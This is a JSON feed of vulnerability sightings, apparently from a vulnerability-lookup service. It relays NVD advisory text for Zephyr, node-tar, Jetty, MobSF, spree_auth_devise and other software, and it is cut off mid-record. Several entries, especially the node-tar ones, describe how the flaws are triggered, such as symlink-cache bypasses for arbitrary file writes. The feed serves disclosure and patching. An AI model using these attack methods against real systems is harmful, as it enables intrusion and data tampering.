{"vulnerability": "a", "sightings": [{"uuid": "2837356b-cb77-4011-bcd4-16ae7018e7d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FM6V-8625-99JF", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/36982", "content": "\u203c CVE-2021-3835 \u203c\n\nBuffer overflow in usb device class. Zephyr versions &gt;= v2.6.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-fm6v-8625-99jf\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-02-08T00:35:46.000000Z"}, {"uuid": "05c5784a-81a4-490a-8788-a766ffec34f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HVFP-W4H8-GXVJ", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/36981", "content": "\u203c CVE-2021-3861 \u203c\n\nThe RNDIS USB device class includes a buffer overflow vulnerability. Zephyr versions &gt;= v2.6.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hvfp-w4h8-gxvj\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-02-08T00:35:45.000000Z"}, {"uuid": "dbccb9f9-95ad-4bb7-a1df-34e612d4eeac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5Q7Q-QQW2-HJQ7", "type": "seen", "source": "https://t.me/cibsecurity/34546", "content": "\u203c CVE-2021-43853 \u203c\n\nAjax.NET Professional (AjaxPro) is an AJAX framework available for Microsoft ASP.NET. Affected versions of this package are vulnerable to JavaScript object injection which may result in cross site scripting when leveraged by a malicious user. The affected core relates to JavaScript object creation when parsing json input. Releases before version 21.12.22.1 are affected. A workaround exists that replaces one of the core JavaScript files embedded in the library. See the GHSA-5q7q-qqw2-hjq7 for workaround details.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-23T00:18:30.000000Z"}, {"uuid": "b165818c-ae71-4e07-a2ef-5e8cab65767d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7G38-3X9V-V7VP", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30848", "content": "\u203c CVE-2021-3455 \u203c\n\nDisconnecting L2CAP channel right after invalid ATT request leads freeze. Zephyr versions &gt;= 2.4.0, &gt;= 2.5.0 contain Use After Free (CWE-416). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-7g38-3x9v-v7vp\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-20T02:33:36.000000Z"}, {"uuid": "ab2887d1-ce2d-4089-9fe4-a725eb498869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FX88-6C29-VRP3", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30847", "content": "\u203c CVE-2021-3454 \u203c\n\nTruncated L2CAP K-frame causes assertion failure. Zephyr versions &gt;= 2.4.0, &gt;= v.2.50 contain Improper Handling of Length Parameter Inconsistency (CWE-130), Reachable Assertion (CWE-617). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-fx88-6c29-vrp3\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-20T02:33:34.000000Z"}, {"uuid": "533e7467-ed61-4eb3-a317-65a9de440098", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XM34-V85H-9PG2", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/32557", "content": "\u203c CVE-2021-41275 \u203c\n\nspree_auth_devise is an open source library which provides authentication and authorization services for use with the Spree storefront framework by using an underlying Devise authentication framework. In affected versions spree_auth_devise is subject to a CSRF vulnerability that allows user account takeover. All applications using any version of the frontend component of spree_auth_devise are affected if protect_from_forgery method is both: Executed whether as: A before_action callback (the default). A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). Users are advised to update their spree_auth_devise gem. For users unable to update it may be possible to change your strategy to :exception. Please see the linked GHSA for more workaround details. ### Impact CSRF vulnerability that allows user account takeover. All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both: * Executed whether as: * A before_action callback (the default) * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). * Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). That means that applications that haven't been configured differently from what it's generated with Rails aren't affected. Thanks @waiting-for-dev for reporting and providing a patch ? ### Patches Spree 4.3 users should update to spree_auth_devise 4.4.1 Spree 4.2 users should update to spree_auth_devise 4.2.1 ### Workarounds If possible, change your strategy to :exception: ```ruby class ApplicationController &lt; ActionController::Base protect_from_forgery with: :exception end ``` Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller: ```ruby config.after_initialize do Spree::UsersController.protect_from_forgery with: :exception end ``` ### References https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T22:15:07.000000Z"}, {"uuid": "f634bf4b-2d80-4ad9-b7af-66f2940e44ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8Q65-5GQF-FMW5", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30011", "content": "\u203c CVE-2021-3581 \u203c\n\nBuffer Access with Incorrect Length Value in zephyr. Zephyr versions &gt;= &gt;=2.5.0 contain Buffer Access with Incorrect Length Value (CWE-805). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-8q65-5gqf-fmw5\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-06T00:30:57.000000Z"}, {"uuid": "479b1392-f829-4f5e-a9f2-0bbda754358e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94JG-2P6Q-5364", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30010", "content": "\u203c CVE-2021-3319 \u203c\n\nDOS: Incorrect 802154 Frame Validation for Omitted Source / Dest Addresses. Zephyr versions &gt;= &gt; v2.4.0 contain NULL Pointer Dereference (CWE-476), Attempt to Access Child of a Non-structure Pointer (CWE-588). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-94jg-2p6q-5364\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-06T00:30:53.000000Z"}, {"uuid": "d6c73e59-c414-43fd-8648-35dac08eae91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J76F-35MC-4H63", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30012", "content": "\u203c CVE-2021-3436 \u203c\n\nBT: Possible to overwrite an existing bond during keys distribution phase when the identity address of the bond is known. Zephyr versions &gt;= 1.14.2, &gt;= 2.4.0, &gt;= 2.5.0 contain Use of Multiple Resources with Duplicate Identifier (CWE-694). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-j76f-35mc-4h63\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-06T00:30:58.000000Z"}, {"uuid": "99d0c1ce-4f02-4777-8efb-d938e97284ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C3GR-HGVR-F363", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30008", "content": "\u203c CVE-2021-3625 \u203c\n\nBuffer overflow in Zephyr USB DFU DNLOAD. Zephyr versions &gt;= v2.5.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-c3gr-hgvr-f363\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-06T00:30:51.000000Z"}, {"uuid": "d1ea5a9f-32a6-4d6e-a5f8-61ab86ba0795", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-289F-7MW3-2QF4", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30006", "content": "\u203c CVE-2021-3510 \u203c\n\nZephyr JSON decoder incorrectly decodes array of array. Zephyr versions &gt;= &gt;1.14.0, &gt;= &gt;2.5.0 contain Attempt to Access Child of a Non-structure Pointer (CWE-588). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-289f-7mw3-2qf4\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-06T00:30:49.000000Z"}, {"uuid": "245c38cc-19ef-4672-9e94-cb309f9ebdd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6GVV-9Q92-W5F6", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30987", "content": "\u203c CVE-2021-41168 \u203c\n\nSnudown is a reddit-specific fork of the Sundown Markdown parser used by GitHub, with Python integration added. In affected versions snudown was found to be vulnerable to denial of service attacks to its reference table implementation. References written in markdown ` [reference_name]: https://www.example.com` are inserted into a hash table which was found to have a weak hash function, meaning that an attacker can reliably generate a large number of collisions for it. This makes the hash table vulnerable to a hash-collision DoS attack, a type of algorithmic complexity attack. Further the hash table allowed for duplicate entries resulting in long retrieval times. Proofs of concept and further discussion of the hash collision issue are discussed on the snudown GHSA(https://github.com/reddit/snudown/security/advisories/GHSA-6gvv-9q92-w5f6). Users are advised to update to version 1.7.0.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-22T00:37:18.000000Z"}, {"uuid": "92dc1ba6-e22b-4d53-96eb-27f9439bc64f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-89J6-QPXF-PFPC", "type": "seen", "source": "https://t.me/cibsecurity/30473", "content": "\u203c CVE-2021-3323 \u203c\n\nInteger Underflow in 6LoWPAN IPHC Header Uncompression in Zephyr. Zephyr versions &gt;= &gt;=2.4.0 contain Integer Underflow (Wrap or Wraparound) (CWE-191). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-89j6-qpxf-pfpc\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-13T02:25:55.000000Z"}, {"uuid": "0501aabf-64f3-4e48-9354-d77433ca71ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W44J-66G7-XW99", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30472", "content": "\u203c CVE-2021-3321 \u203c\n\nInteger Underflow in Zephyr in IEEE 802154 Fragment Reassembly Header Removal. Zephyr versions &gt;= &gt;=2.4.0 contain Integer Overflow to Buffer Overflow (CWE-680). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-w44j-66g7-xw99\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-13T02:25:55.000000Z"}, {"uuid": "6694c249-1934-4363-a085-c946c8ad9add", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJ4R-373F-9456", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/30471", "content": "\u203c CVE-2021-3330 \u203c\n\nRCE/DOS: Linked-list corruption leading to large out-of-bounds write while sorting for forged fragment list in Zephyr. Zephyr versions &gt;= &gt;=2.4.0 contain Out-of-bounds Write (CWE-787). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-fj4r-373f-9456\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-13T02:25:54.000000Z"}, {"uuid": "f58ce7e8-8877-4997-96f4-ffb566aba956", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P86R-GC4R-4MQ3", "type": "seen", "source": "https://t.me/cibsecurity/30470", "content": "\u203c CVE-2021-3322 \u203c\n\nUnexpected Pointer Aliasing in IEEE 802154 Fragment Reassembly in Zephyr. Zephyr versions &gt;= &gt;=2.4.0 contain NULL Pointer Dereference (CWE-476). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p86r-gc4r-4mq3\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-13T02:25:53.000000Z"}, {"uuid": "d457767f-9de4-4466-bf50-61b7d4d85779", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GMW6-94GG-2RC2", "type": "seen", "source": "https://t.me/cibsecurity/28112", "content": "\u203c CVE-2021-39135 \u203c\n\n`@npmcli/arborist`, the library that calculates dependency trees and manages the node_modules folder hierarchy for the npm command line interface, aims to guarantee that package dependency contracts will be met, and the extraction of package contents will always be performed into the expected folder. This is accomplished by extracting package contents into a project's `node_modules` folder. If the `node_modules` folder of the root project or any of its dependencies is somehow replaced with a symbolic link, it could allow Arborist to write package dependencies to any arbitrary location on the file system. Note that symbolic links contained within package artifact contents are filtered out, so another means of creating a `node_modules` symbolic link would have to be employed. 1. A `preinstall` script could replace `node_modules` with a symlink. (This is prevented by using `--ignore-scripts`.) 2. An attacker could supply the target with a git repository, instructing them to run `npm install --ignore-scripts` in the root. This may be successful, because `npm install --ignore-scripts` is typically not capable of making changes outside of the project directory, so it may be deemed safe. This is patched in @npmcli/arborist 2.8.2 which is included in npm v7.20.7 and above. For more information including workarounds please see the referenced GHSA-gmw6-94gg-2rc2.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-08-31T20:33:48.000000Z"}, {"uuid": "6ddae061-77d1-405d-a5ef-d994cac9c530", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QQ89-HQ3F-393P", "type": "seen", "source": "https://t.me/cibsecurity/28114", "content": "\u203c CVE-2021-37712 \u203c\n\nThe npm package \"tar\" (aka node-tar) before versions 4.4.18, 5.0.10, and 6.1.9 has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 \"short path\" counterparts. A specially crafted tar archive could thus include a directory with one form of the path, followed by a symbolic link with a different string that resolves to the same file system entity, followed by a file using the first form. By first creating a directory, and then replacing that directory with a symlink that had a different apparent name that resolved to the same entry in the filesystem, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. These issues were addressed in releases 4.4.18, 5.0.10 and 6.1.9. The v3 branch of node-tar has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of node-tar. If this is not possible, a workaround is available in the referenced GHSA-qq89-hq3f-393p.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-08-31T20:33:52.000000Z"}, {"uuid": "b7820762-4cc0-476c-8afd-e424729053f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9R2W-394V-53QC", "type": "seen", "source": "https://t.me/cibsecurity/28108", "content": "\u203c CVE-2021-37701 \u203c\n\nThe npm package \"tar\" (aka node-tar) before versions 4.4.16, 5.0.8, and 6.1.7 has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\\` and `/` characters as path separators, however `\\` is a valid filename character on posix systems. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. These issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7. The v3 branch of node-tar has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of node-tar. If this is not possible, a workaround is available in the referenced GHSA-9r2w-394v-53qc.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-08-31T20:33:42.000000Z"}, {"uuid": "6040a559-d316-4762-b35e-fb0e44b49826", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ6R-2JPM-QVXP", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/27185", "content": "\u203c CVE-2021-37694 \u203c\n\n@asyncapi/java-spring-cloud-stream-template generates a Spring Cloud Stream (SCSt) microservice. In versions prior to 0.7.0 arbitrary code injection was possible when an attacker controls the AsyncAPI document. An example is provided in GHSA-xj6r-2jpm-qvxp. There are no mitigations available and all users are advised to update.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-08-11T22:38:40.000000Z"}, {"uuid": "6ffe5b51-a48d-44c1-a684-4fd4394423bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:2307", "type": "published-proof-of-concept", "source": "Telegram/OphBtcFHpzsAaa_PBsn-6jMA-guExzs3Tjx94NVn8zTfkHs", "content": "", "creation_timestamp": "2021-06-10T02:57:54.000000Z"}, {"uuid": "e1415ba1-c01a-494d-82a2-cd637cf3fb51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V7FF-8WCX-GMC5", "type": "seen", "source": "https://t.me/cibsecurity/26189", "content": "\u203c CVE-2021-34429 \u203c\n\nFor Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 &amp; 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-07-15T20:26:58.000000Z"}, {"uuid": "bdc25299-f1d5-481a-b542-97afb44aad8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3CRJ-W4F5-GWH4", "type": "seen", "source": "https://t.me/cibsecurity/23659", "content": "\u203c CVE-2021-21316 \u203c\n\nless-openui5 is an npm package which enables building OpenUI5 themes with Less.js. In less-openui5 before version 0.10., when processing theming resources (i.e. `*.less` files) with less-openui5 that originate from an untrusted source, those resources might contain JavaScript code which will be executed in the context of the build process. While this is a feature of the Less.js library it is an unexpected behavior in the context of OpenUI5 and SAPUI5 development. Especially in the context of UI5 Tooling which relies on less-openui5. An attacker might create a library or theme-library containing a custom control or theme, hiding malicious JavaScript code in one of the .less files. Refer to the referenced GHSA-3crj-w4f5-gwh4 for examples. Starting with Less.js version 3.0.0, the Inline JavaScript feature is disabled by default. less-openui5 however currently uses a fork of Less.js v1.6.3. Note that disabling the Inline JavaScript feature in Less.js versions 1.x, still evaluates code has additional double codes around it. We decided to remove the inline JavaScript evaluation feature completely from the code of our Less.js fork. This fix is available in less-openui5 version 0.10.0.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-02-16T20:47:54.000000Z"}, {"uuid": "9b97e136-3e6a-4714-af9b-54921ef9042e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XMW9-Q7X9-J5QC", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/22982", "content": "\u203c CVE-2021-21293 \u203c\n\nblaze is a Scala library for building asynchronous pipelines, with a focus on network IO. All servers running blaze-core before version 0.14.15 are affected by a vulnerability in which unbounded connection acceptance leads to file handle exhaustion. Blaze, accepts connections unconditionally on a dedicated thread pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. The vast majority of affected users are using it as part of http4s-blaze-server &lt;= 0.21.16. http4s provides a mechanism for limiting open connections, but is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. The issue is fixed in version 0.14.15 for \"NIO1SocketServerGroup\". A \"maxConnections\" parameter is added, with a default value of 512. Concurrent connections beyond this limit are rejected. To run unbounded, which is not recommended, set a negative number. The \"NIO2SocketServerGroup\" has no such setting and is now deprecated. There are several possible workarounds described in the refrenced GitHub Advisory GHSA-xmw9-q7x9-j5qc.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-02-03T00:55:48.000000Z"}, {"uuid": "9da35102-a896-43e2-8cb8-61295b5778be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XHV5-W9C5-2R2W", "type": "seen", "source": "https://t.me/cibsecurity/22978", "content": "\u203c CVE-2021-21294 \u203c\n\nHttp4s (http4s-blaze-server) is a minimal, idiomatic Scala interface for HTTP services. Http4s before versions 0.21.17, 0.22.0-M2, and 1.0.0-M14 have a vulnerability which can lead to a denial-of-service. Blaze-core, a library underlying http4s-blaze-server, accepts connections unboundedly on its selector pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. http4s provides a general \"MaxActiveRequests\" middleware mechanism for limiting open connections, but it is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. In 0.21.17, 0.22.0-M2, and 1.0.0-M14, a new \"maxConnections\" property, with a default value of 1024, has been added to the `BlazeServerBuilder`. Setting the value to a negative number restores unbounded behavior, but is strongly disrecommended. The NIO2 backend does not respect `maxConnections`. Its use is now deprecated in http4s-0.21, and the option is removed altogether starting in http4s-0.22. There are several possible workarounds described in the refrenced GitHub Advisory GHSA-xhv5-w9c5-2r2w.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-02-03T00:55:45.000000Z"}, {"uuid": "cea3fb6f-9597-4ff4-a404-6c5155e5b1e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:2414", "type": "seen", "source": "https://t.me/cibsecurity/17446", "content": "\u203c CVE-2020-10772 \u203c\n\nAn incomplete fix for CVE-2020-12662 was shipped for Unbound in Red Hat Enterprise Linux 7, as part of erratum RHSA-2020:2414. Vulnerable versions of Unbound could still amplify an incoming query into a large number of queries directed to a target, even with a lower amplification ratio compared to versions of Unbound that shipped before the mentioned erratum. This issue is about the incomplete fix for CVE-2020-12662, and it does not affect upstream versions of Unbound.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-12-09T07:32:10.000000Z"}, {"uuid": "0ba1eb85-3ed2-4400-8794-302d5ea5cc94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8M9J-2F32-2VX4", "type": "seen", "source": "https://t.me/androidMalware/2299", "content": "Open Redirect in Login Redirect in MobSF (CVE-2024-41955)\nUpdate to MobSF v4.0.5.\nhttps://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-8m9j-2f32-2vx4", "creation_timestamp": "2024-08-04T03:44:51.000000Z"}, {"uuid": "7e038007-49b9-46d9-943b-966c537cfeda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-56HP-XQP3-W2JF", "type": "seen", "source": "Telegram/x7kX4PZBtnG_uQa2DJABTToNpcoCdFXitU976Bw1W0XFRyo", "content": "", "creation_timestamp": "2021-06-17T08:20:29.000000Z"}, {"uuid": "90e1c413-c5cb-49bb-afb1-98be304b59f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WFGJ-WRGH-H3R3", "type": "seen", "source": "https://t.me/androidMalware/2190", "content": "SSRF in Mobile Security Framework (MobSF) version 3.9.5 Beta and prior (CVE-2024-29190)\nMobSF does not perform any input validation when extracting the hostnames in android:host, so requests can also be sent to local hostnames. This can lead to server-side request forgery (SSRF). An attacker can cause the server to make a connection to internal-only services within the organization's infrastructure\nhttps://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-wfgj-wrgh-h3r3", "creation_timestamp": "2024-06-01T02:51:42.000000Z"}, {"uuid": "f7aa52ee-4e78-45b8-bce4-6c2c0ff21625", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:2681", "type": "published-proof-of-concept", "source": "Telegram/xNqdYy8CfDhsvwz3ioZAGZcqgnt6goaxcSNoVqt048pluKg", "content": "", "creation_timestamp": "2021-05-28T14:50:38.000000Z"}, {"uuid": "1151f00e-972a-48ba-ba66-b2458bc63352", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:2218", "type": "published-proof-of-concept", "source": "Telegram/xNqdYy8CfDhsvwz3ioZAGZcqgnt6goaxcSNoVqt048pluKg", "content": "", "creation_timestamp": "2021-05-28T14:50:38.000000Z"}, {"uuid": "196cf95a-2c48-4662-a48f-f411a7b4ae1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:4381", "type": "seen", "source": "Telegram/cbaxTd52fBV52JH_AbRvmVYqdS5Lho2y0BCQUh1YEpXtdsI", "content": "", "creation_timestamp": "2021-06-08T03:18:29.000000Z"}, {"uuid": "b4d5f884-4f5c-407c-a308-870c501af7cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:5554", "type": "published-proof-of-concept", "source": "Telegram/N-v1Hh00wQ-HXBE4zVMhrJUavdzcGWthCou_MmjKrO0rSbs", "content": "", "creation_timestamp": "2021-06-08T03:18:34.000000Z"}, {"uuid": "5c3450d9-2386-41b0-b360-59d698db3616", 